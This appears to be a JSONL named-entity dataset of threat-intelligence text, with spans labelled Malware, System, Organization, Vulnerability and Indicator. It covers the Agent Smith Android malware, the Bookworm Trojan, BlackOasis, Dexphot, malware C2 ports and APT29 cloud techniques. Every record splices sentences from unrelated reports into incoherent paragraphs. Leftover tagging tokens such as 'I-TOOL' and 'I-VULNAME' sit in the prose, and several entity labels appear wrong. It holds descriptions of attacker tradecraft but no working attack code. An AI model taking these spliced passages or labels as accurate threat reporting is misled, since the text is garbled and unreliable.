The term zero-day is indicative of a software flaw that remains unknown to the software \u2019s creator . Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": [{"start": 251, "end": 264, "label": "System"}, {"start": 270, "end": 278, "label": "System"}, {"start": 300, "end": 311, "label": "Organization"}, {"start": 376, "end": 384, "label": "Vulnerability"}, {"start": 468, "end": 481, "label": "Malware"}, {"start": 518, "end": 573, "label": "Indicator"}, {"start": 576, "end": 587, "label": "Malware"}, {"start": 588, "end": 683, "label": "Indicator"}]} {"text": ") are filled in and verified . So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand . Zero-days can be highly disruptive because they provide a window of time for an attacker to breach victims before the vendor is able to apply a software update to address the specific security hole . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": [{"start": 83, "end": 98, "label": "System"}, {"start": 145, "end": 154, "label": "Vulnerability"}, {"start": 345, "end": 352, "label": "Malware"}]} {"text": "The information is then stored in local app database as well as sent to the backend . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application . U.S . cybersecurity firm FireEye also recently captured BlackOasis activity as part of a similar incident where the group relied on a different zero-day exploit \u2014 more specifically , a SOAP WSDL I-TOOL parser I-VULNAME E-TOOL code injection vulnerability \u2014 to install FinSpy onto a small number of devices . 
Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": [{"start": 146, "end": 167, "label": "System"}, {"start": 197, "end": 216, "label": "System"}, {"start": 245, "end": 260, "label": "System"}, {"start": 264, "end": 294, "label": "System"}, {"start": 322, "end": 329, "label": "Organization"}, {"start": 353, "end": 363, "label": "Organization"}, {"start": 441, "end": 449, "label": "Vulnerability"}, {"start": 482, "end": 486, "label": "System"}, {"start": 487, "end": 537, "label": "Vulnerability"}, {"start": 565, "end": 571, "label": "Malware"}, {"start": 741, "end": 745, "label": "Organization"}, {"start": 796, "end": 837, "label": "Indicator"}]} {"text": "Agent Smith : A New Species of Mobile Malware July 10 , 2019 Check Point Researchers recently discovered a new variant of mobile malware that quietly infected around 25 million devices , while the user remains completely unaware . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . Again , the attacker \u2019s intention appeared to be espionage . \u201c Unlike other FinFisher customers or users who focus mostly on domestic operations , BlackOasis focuses on external operations and go after a wide range of targets around the world , \u201d explained Costin Raiu , director of the global research and analysis team at Kaspersky Lab . 
GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 61, "end": 72, "label": "Organization"}, {"start": 235, "end": 254, "label": "System"}, {"start": 316, "end": 326, "label": "Malware"}, {"start": 344, "end": 354, "label": "Malware"}, {"start": 495, "end": 504, "label": "Organization"}, {"start": 566, "end": 576, "label": "Organization"}, {"start": 743, "end": 756, "label": "Organization"}, {"start": 759, "end": 768, "label": "Malware"}, {"start": 773, "end": 906, "label": "Indicator"}, {"start": 909, "end": 919, "label": "Malware"}, {"start": 924, "end": 989, "label": "Indicator"}, {"start": 992, "end": 1000, "label": "Malware"}, {"start": 1001, "end": 1056, "label": "Indicator"}, {"start": 1059, "end": 1067, "label": "Malware"}, {"start": 1072, "end": 1108, "label": "Indicator"}, {"start": 1142, "end": 1163, "label": "Malware"}, {"start": 1164, "end": 1277, "label": "Indicator"}, {"start": 1280, "end": 1285, "label": "Malware"}, {"start": 1295, "end": 1308, "label": "Indicator"}, {"start": 1313, "end": 1333, "label": "System"}]} {"text": "Disguised as Google related app , the core part of malware exploits various known Android vulnerabilities and automatically replaces installed apps on the device with malicious versions without the user \u2019 s interaction . targeted attacks . 
Gamma Group has been accused of selling its products to authoritarian regimes that can use the technology to both track dissidents and conduct foreign espionage over the internet . Magic Hound malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.[22][23 ]", "spans": [{"start": 13, "end": 19, "label": "Organization"}, {"start": 82, "end": 105, "label": "Vulnerability"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 421, "end": 440, "label": "Malware"}, {"start": 445, "end": 525, "label": "Indicator"}]} {"text": "This unique on-device , just-in-time ( JIT ) approach inspired researchers to dub this malware as \u201c Agent Smith \u201d . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . Metamorfo has communicated with hosts over raw TCP on port 9999.[24 ]", "spans": [{"start": 100, "end": 111, "label": "Malware"}, {"start": 122, "end": 127, "label": "System"}, {"start": 184, "end": 216, "label": "Malware"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 282, "end": 290, "label": "Vulnerability"}, {"start": 307, "end": 317, "label": "Organization"}, {"start": 372, "end": 381, "label": "Malware"}, {"start": 386, "end": 439, "label": "Indicator"}]} {"text": "\u201c Agent Smith \u201d currently uses its broad access to the device \u2019 s resources to show fraudulent ads for financial gain . The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server . It \u2019s unclear whether the hackers are purchasing the exploits and spyware together , directly from Gamma Group , or if they were able to acquire some of the tools through other avenues . 
\u201c BlackOasis \u2019 interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region . MoonWind communicates over ports 80 , 443 , 53 , and 8080 via raw sockets instead of the protocols usually associated with the ports.[25 ] njRAT has used port 1177 for HTTP C2 communications.[26 ] During Operation Wocao , the threat actors used uncommon high ports for its backdoor C2 , including ports 25667 and 47000.[27 ]", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 144, "end": 152, "label": "System"}, {"start": 161, "end": 175, "label": "System"}, {"start": 240, "end": 248, "label": "System"}, {"start": 376, "end": 383, "label": "Malware"}, {"start": 409, "end": 420, "label": "Organization"}, {"start": 499, "end": 509, "label": "Organization"}, {"start": 645, "end": 653, "label": "Malware"}, {"start": 654, "end": 781, "label": "Indicator"}, {"start": 784, "end": 789, "label": "Malware"}, {"start": 799, "end": 808, "label": "Indicator"}, {"start": 813, "end": 839, "label": "System"}, {"start": 849, "end": 864, "label": "Organization"}, {"start": 871, "end": 884, "label": "Organization"}, {"start": 890, "end": 909, "label": "Indicator"}, {"start": 918, "end": 929, "label": "System"}, {"start": 942, "end": 953, "label": "Indicator"}, {"start": 958, "end": 967, "label": "Indicator"}]} {"text": "This activity resembles previous campaigns such as Gooligan , HummingBad and CopyCat . Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server . This includes prominent figures in the United Nations , opposition bloggers and activists , and regional news correspondents , \u201d a blogpost about Kaspersky \u2019s findings reads . 
PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": [{"start": 51, "end": 59, "label": "Malware"}, {"start": 62, "end": 72, "label": "Malware"}, {"start": 77, "end": 84, "label": "Malware"}, {"start": 114, "end": 122, "label": "System"}, {"start": 170, "end": 178, "label": "System"}, {"start": 254, "end": 268, "label": "Malware"}, {"start": 333, "end": 339, "label": "System"}, {"start": 354, "end": 384, "label": "Malware"}, {"start": 533, "end": 542, "label": "Organization"}, {"start": 563, "end": 571, "label": "Malware"}, {"start": 580, "end": 585, "label": "System"}, {"start": 586, "end": 600, "label": "Indicator"}, {"start": 605, "end": 611, "label": "System"}]} {"text": "The primary targets , so far , are based in India though other Asian countries such as Pakistan and Bangladesh are also affected . While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand . The post continues , \u201c during 2016 , we observed a heavy interest in Angola , exemplified by lure documents indicating targets with suspected ties to oil , money laundering , and other illicit activities . 
PoetRAT used TLS to encrypt communications over port 143 QuasarRAT can use port 4782 on the compromised host for TCP callbacks .", "spans": [{"start": 186, "end": 194, "label": "System"}, {"start": 248, "end": 256, "label": "System"}, {"start": 509, "end": 516, "label": "Malware"}, {"start": 522, "end": 525, "label": "System"}, {"start": 552, "end": 565, "label": "Indicator"}, {"start": 566, "end": 575, "label": "Malware"}, {"start": 584, "end": 593, "label": "Indicator"}]} {"text": "In a much-improved Android security environment , the actors behind Agent Smith seem to have moved into the more complex world of constantly searching for new loopholes , such as Janus , Bundle and Man-in-the-Disk , to achieve a 3-stage infection chain , in order to build a botnet of controlled devices to earn profit for the perpetrator . Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server . There is also an interest in international activists and think tanks \u2026 Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . 
\u201d RedLeaves can use HTTP over non - standard ports , such as 995 , for C2.Rocke 's miner connects to a C2 server using port 51640.[32 ]", "spans": [{"start": 19, "end": 26, "label": "System"}, {"start": 68, "end": 79, "label": "Malware"}, {"start": 179, "end": 184, "label": "Vulnerability"}, {"start": 187, "end": 193, "label": "Vulnerability"}, {"start": 198, "end": 213, "label": "Vulnerability"}, {"start": 348, "end": 356, "label": "System"}, {"start": 559, "end": 569, "label": "Organization"}, {"start": 761, "end": 770, "label": "Malware"}, {"start": 775, "end": 823, "label": "Indicator"}, {"start": 862, "end": 871, "label": "System"}, {"start": 878, "end": 892, "label": "Indicator"}]} {"text": "\u201c Agent Smith \u201d is possibly the first campaign seen that ingrates and weaponized all these loopholes and are described in detail below . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server . Intent was clearly espionage in many cases , going outside of that \"lawful surveillance\" boundary.\u2014 Brian Bartholomew ( @Mao_Ware ) October 16, 2017 Brian Bartholomew , a senior security researcher with Kaspersky , said on Twitter that BlackOasis \u2019 espionage included non-traditional targets \u2014 \u201c going outside of that lawful surveillance boundary. \u201d RTM used Port 44443 for its VNC module .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 155, "end": 163, "label": "System"}, {"start": 522, "end": 531, "label": "Organization"}, {"start": 542, "end": 549, "label": "System"}, {"start": 555, "end": 565, "label": "Organization"}, {"start": 669, "end": 672, "label": "Organization"}, {"start": 678, "end": 688, "label": "Indicator"}, {"start": 697, "end": 707, "label": "System"}]} {"text": "In this case , \u201c Agent Smith \u201d is being used to for financial gain through the use of malicious advertisements . 
Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns . An advanced persistent threat group , previously identified by Microsoft and codenamed Neodymium , is closely associated with BlackOasis \u2019 operations . Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": [{"start": 17, "end": 28, "label": "Malware"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 183, "end": 191, "label": "System"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 420, "end": 429, "label": "Organization"}, {"start": 459, "end": 469, "label": "Organization"}, {"start": 485, "end": 498, "label": "Organization"}, {"start": 508, "end": 517, "label": "Indicator"}, {"start": 556, "end": 570, "label": "System"}, {"start": 573, "end": 580, "label": "Organization"}, {"start": 590, "end": 598, "label": "Indicator"}, {"start": 670, "end": 680, "label": "Organization"}, {"start": 690, "end": 695, "label": "System"}, {"start": 696, "end": 710, "label": "Indicator"}, {"start": 714, "end": 734, "label": "System"}, {"start": 737, "end": 745, "label": "Malware"}, {"start": 755, "end": 764, "label": "Indicator"}, {"start": 769, "end": 795, "label": "System"}]} {"text": "However , it could easily be used for far more intrusive and harmful purposes such as banking credential theft . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . 
Last year , Microsoft researchers described Neodymium \u2019s behavior as unusual : \u201c unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": [{"start": 113, "end": 119, "label": "System"}, {"start": 123, "end": 131, "label": "System"}, {"start": 227, "end": 231, "label": "Malware"}, {"start": 280, "end": 289, "label": "Organization"}, {"start": 312, "end": 321, "label": "Organization"}, {"start": 456, "end": 466, "label": "Organization"}, {"start": 471, "end": 480, "label": "Organization"}, {"start": 565, "end": 575, "label": "Malware"}, {"start": 580, "end": 658, "label": "Indicator"}, {"start": 666, "end": 668, "label": "System"}]} {"text": "Indeed , due to its ability to hide it \u2019 s icon from the launcher and impersonates any popular existing apps on a device , there are endless possibilities for this sort of malware to harm a user \u2019 s device . The developers of Bookworm use these modules in a rather unique way , as the other embedded DLLs provide API functions for Leader to carry out its tasks . These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region . 
Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": [{"start": 226, "end": 234, "label": "System"}, {"start": 331, "end": 337, "label": "System"}, {"start": 428, "end": 436, "label": "Vulnerability"}, {"start": 513, "end": 521, "label": "Malware"}, {"start": 540, "end": 559, "label": "Indicator"}, {"start": 564, "end": 568, "label": "Indicator"}, {"start": 573, "end": 575, "label": "System"}]} {"text": "Check Point Research has submitted data to Google and law enforcement units to facilitate further investigation . Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand . Their targets , however , appear to be individuals that do not share common affiliations. \u201d Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 181, "end": 197, "label": "System"}, {"start": 266, "end": 276, "label": "Organization"}, {"start": 401, "end": 409, "label": "Malware"}, {"start": 503, "end": 511, "label": "Indicator"}]} {"text": "As a result , information related to the malicious actor is tentatively redacted in this publication . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . A cursory review of BlackOasis \u2019 espionage campaign suggests there is some overlap between the group \u2019s actions and Saudi Arabia \u2019s geopolitical interests . 
[ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": [{"start": 146, "end": 154, "label": "System"}, {"start": 241, "end": 257, "label": "Malware"}, {"start": 286, "end": 304, "label": "System"}, {"start": 405, "end": 415, "label": "Organization"}, {"start": 549, "end": 558, "label": "Malware"}, {"start": 568, "end": 577, "label": "Indicator"}, {"start": 580, "end": 584, "label": "Indicator"}, {"start": 591, "end": 595, "label": "Indicator"}]} {"text": "Check Point has worked closely with Google and at the time of publishing , no malicious apps remain on the Play Store . We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future . For example , the targeting of Angolan organizations in mid-2016 coincidences directly with the rise of Angola \u2019s oil business with China , which displaced Saudi Arabia as the number one exporter of crude oil to China at the time . WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 36, "end": 42, "label": "Organization"}, {"start": 107, "end": 117, "label": "System"}, {"start": 189, "end": 197, "label": "System"}, {"start": 288, "end": 309, "label": "Organization"}, {"start": 489, "end": 497, "label": "Malware"}, {"start": 522, "end": 533, "label": "Indicator"}]} {"text": "Encounter In early 2019 , the Check Point Research team observed a surge of Android malware attack attempts against users in India which had strong characteristics of Janus vulnerability abuse ; All samples our team collected during preliminary investigation had the ability to hide their app icons and claim to be Google related updaters or vending modules ( a key component of Google Play framework ) . Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand . 
All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": [{"start": 30, "end": 41, "label": "Organization"}, {"start": 76, "end": 83, "label": "System"}, {"start": 167, "end": 172, "label": "Vulnerability"}, {"start": 315, "end": 321, "label": "Organization"}, {"start": 379, "end": 390, "label": "System"}, {"start": 434, "end": 442, "label": "System"}, {"start": 515, "end": 524, "label": "Organization"}, {"start": 545, "end": 555, "label": "Organization"}, {"start": 714, "end": 719, "label": "Malware"}, {"start": 729, "end": 734, "label": "System"}, {"start": 740, "end": 759, "label": "Indicator"}, {"start": 764, "end": 774, "label": "Malware"}, {"start": 783, "end": 832, "label": "Indicator"}]} {"text": "Upon further analysis it became clear this application was as malicious as they come and initially resembled the CopyCat malware , discovered by Check Point Research back in April 2016 . Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand . In addition , Saudi Arabia is a known customer of spyware and has used the technology domestically , according to Citizen Lab , a cybersecurity and human-rights focused research laboratory . 
Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": [{"start": 113, "end": 120, "label": "Malware"}, {"start": 145, "end": 156, "label": "Organization"}, {"start": 243, "end": 262, "label": "System"}, {"start": 410, "end": 417, "label": "Malware"}, {"start": 474, "end": 485, "label": "Organization"}]} {"text": "As the research progressed , it started to reveal unique characteristics which made us believe we were looking at an all-new malware campaign found in the wild . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . Kaspersky \u2019s research notes that BlackOasis hacked into computers based in Saudi Arabia . Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": [{"start": 199, "end": 207, "label": "System"}, {"start": 214, "end": 220, "label": "System"}, {"start": 221, "end": 247, "label": "Malware"}, {"start": 306, "end": 315, "label": "Organization"}, {"start": 339, "end": 349, "label": "Organization"}]} {"text": "After a series of technical analysis ( which is covered in detail below ) and heuristic threat hunting , we discovered that a complete \u201c Agent Smith \u201d infection has three main phases : A dropper app lures victim to install itself voluntarily . We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan . Insights from one year of tracking a polymorphic threat . 
Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": [{"start": 137, "end": 148, "label": "Malware"}, {"start": 287, "end": 296, "label": "System"}, {"start": 427, "end": 443, "label": "Malware"}]} {"text": "The initial dropper has a weaponized Feng Shui Bundle as encrypted asset files . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . A little over a year ago , in October 2018 , our polymorphic outbreak monitoring system detected a large surge in reports , indicating that a large-scale campaign was unfolding . Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxe .", "spans": [{"start": 107, "end": 128, "label": "Malware"}, {"start": 139, "end": 154, "label": "System"}, {"start": 160, "end": 176, "label": "Malware"}, {"start": 396, "end": 401, "label": "Organization"}]} {"text": "Dropper variants are usually barely functioning photo utility , games , or sex related apps . A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices . 
During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": [{"start": 113, "end": 129, "label": "Malware"}, {"start": 171, "end": 179, "label": "Malware"}, {"start": 394, "end": 415, "label": "Organization"}, {"start": 418, "end": 423, "label": "Organization"}]} {"text": "The dropper automatically decrypts and installs its core malware APK which later conducts malicious patching and app updates . Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . We gave the threat the name \u201c Dexphot , \u201d based on certain characteristics of the malware code . Device Registration APT29 has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account .", "spans": [{"start": 162, "end": 173, "label": "Malware"}, {"start": 191, "end": 201, "label": "Malware"}, {"start": 215, "end": 232, "label": "Malware"}, {"start": 247, "end": 255, "label": "System"}, {"start": 305, "end": 312, "label": "Malware"}, {"start": 372, "end": 397, "label": "Organization"}]} {"text": "The core malware is usually disguised as Google Updater , Google Update for U or \u201c com.google.vending \u201d . We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . The Dexphot attack used a variety of sophisticated methods to evade security solutions . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . 
.006", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 58, "end": 64, "label": "Organization"}, {"start": 83, "end": 101, "label": "Indicator"}, {"start": 122, "end": 138, "label": "System"}, {"start": 139, "end": 165, "label": "Malware"}, {"start": 307, "end": 314, "label": "Malware"}, {"start": 403, "end": 424, "label": "Organization"}, {"start": 427, "end": 432, "label": "Organization"}]} {"text": "The core malware \u2019 s icon is hidden . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . Layers of obfuscation , encryption , and the use of randomized file names hid the installation process . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": [{"start": 46, "end": 61, "label": "Malware"}, {"start": 292, "end": 310, "label": "Organization"}, {"start": 386, "end": 388, "label": "System"}, {"start": 392, "end": 399, "label": "Malware"}, {"start": 410, "end": 420, "label": "Malware"}]} {"text": "The core malware extracts the device \u2019 s installed app list . The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event . Dexphot then used fileless techniques to run malicious code directly in memory , leaving only a few traces that can be used for forensics . 
APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": [{"start": 150, "end": 155, "label": "Organization"}, {"start": 269, "end": 276, "label": "Malware"}, {"start": 409, "end": 414, "label": "Organization"}]} {"text": "If it finds apps on its prey list ( hard-coded or sent from C & C server ) , it will extract the base APK of the target innocent app on the device , patch the APK with malicious ads modules , install the APK back and replace the original one as if it is an update . Chitpas is heavily involved with Thailand politics and was a core leader of the People's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 . It hijacked legitimate system processes to disguise malicious activity . Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": [{"start": 308, "end": 316, "label": "Organization"}, {"start": 554, "end": 588, "label": "Organization"}, {"start": 598, "end": 615, "label": "System"}, {"start": 620, "end": 659, "label": "System"}]} {"text": "\u201c Agent Smith \u201d repacks its prey apps at smali/baksmali code level . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand . If not stopped , Dexphot ultimately ran a cryptocurrency miner on the device , with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware . 
Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 95, "end": 100, "label": "System"}, {"start": 120, "end": 141, "label": "System"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 413, "end": 428, "label": "Organization"}, {"start": 447, "end": 466, "label": "System"}, {"start": 501, "end": 528, "label": "System"}]} {"text": "During the final update installation process , it relies on the Janus vulnerability to bypass Android \u2019 s APK integrity checks . These images were associated with the Bookworm campaign code \" 20150905 \" . In the months that followed , we closely tracked the threat and witnessed the attackers upgrade the malware , target new processes , and work around defensive measures . They have also utilized AADInternals PowerShell Modules to access the API .003 Compromise Accounts : Cloud Accounts APT29 has used residential proxies , including Azure Virtual Machines , to obfuscate their access to victim environments .", "spans": [{"start": 64, "end": 69, "label": "Vulnerability"}, {"start": 94, "end": 101, "label": "System"}, {"start": 476, "end": 496, "label": "Organization"}, {"start": 506, "end": 525, "label": "System"}, {"start": 538, "end": 560, "label": "System"}]} {"text": "Upon kill chain completion , \u201c Agent Smith \u201d will then hijack compromised user apps to show ads . Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems ( ASN ) located in Thailand . While Microsoft Defender Advanced Threat Protection \u2019s pre-execution detection engines blocked Dexphot in most cases , behavior-based machine learning models provided protection for cases where the threat slipped through . 
Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": [{"start": 31, "end": 42, "label": "Malware"}, {"start": 98, "end": 105, "label": "Organization"}, {"start": 150, "end": 158, "label": "System"}, {"start": 286, "end": 331, "label": "System"}, {"start": 375, "end": 382, "label": "Malware"}, {"start": 550, "end": 575, "label": "Organization"}, {"start": 578, "end": 583, "label": "Organization"}]} {"text": "In certain situations , variants intercept compromised apps \u2019 original legitimate ads display events and report back to the intended ad-exchange with the \u201c Agent Smith \u201d campaign hacker \u2019 s ad IDs . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group . Given the threat \u2019s persistence mechanisms , polymorphism , and use of fileless techniques , behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors . They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": [{"start": 156, "end": 167, "label": "Malware"}, {"start": 645, "end": 651, "label": "System"}]} {"text": "Our intelligence shows \u201c Agent Smith \u201d droppers proliferate through third-party app store \u201c 9Apps \u201d , a UC team backed store , targeted mostly at Indian ( Hindi ) , Arabic , and Indonesian users . We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers . Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign . 
Dynamic Resolution During the SolarWinds Compromise , APT29 used dynamic DNS resolution to construct and resolve to randomly - generated subdomains for C2.[12 ]", "spans": [{"start": 25, "end": 36, "label": "Malware"}, {"start": 92, "end": 97, "label": "System"}, {"start": 286, "end": 305, "label": "Organization"}, {"start": 332, "end": 350, "label": "System"}, {"start": 452, "end": 459, "label": "Malware"}, {"start": 501, "end": 522, "label": "Organization"}, {"start": 525, "end": 530, "label": "Organization"}]} {"text": "\u201c Agent Smith \u201d itself , though , seems to target mainly India users . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Over time , Dexphot-related malicious behavior reports dropped to a low hum , as the threat lost steam . Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 85, "end": 93, "label": "System"}, {"start": 202, "end": 207, "label": "System"}, {"start": 210, "end": 220, "label": "System"}, {"start": 223, "end": 228, "label": "System"}, {"start": 367, "end": 372, "label": "Organization"}]} {"text": "Unlike previously discovered non Google Play centric campaigns whose victims almost exclusively come from less developed countries and regions , \u201c Agent Smith \u201d successfully penetrated into noticeable number of devices in developed countries such as Saudi Arabia , UK and US . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat . 
Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": [{"start": 33, "end": 44, "label": "System"}, {"start": 147, "end": 158, "label": "Malware"}, {"start": 291, "end": 299, "label": "System"}, {"start": 408, "end": 413, "label": "System"}, {"start": 416, "end": 426, "label": "System"}, {"start": 429, "end": 434, "label": "System"}, {"start": 474, "end": 481, "label": "Malware"}, {"start": 560, "end": 581, "label": "Organization"}]} {"text": "Technical Analysis \u201c Agent Smith \u201d has a modular structure and consists of the following modules : Loader Core Boot Patch AdSDK Updater As stated above , the first step of this infection chain is the dropper . Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign . More importantly , one year \u2019s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot \u2019s authors , but of cybercriminals in general . 
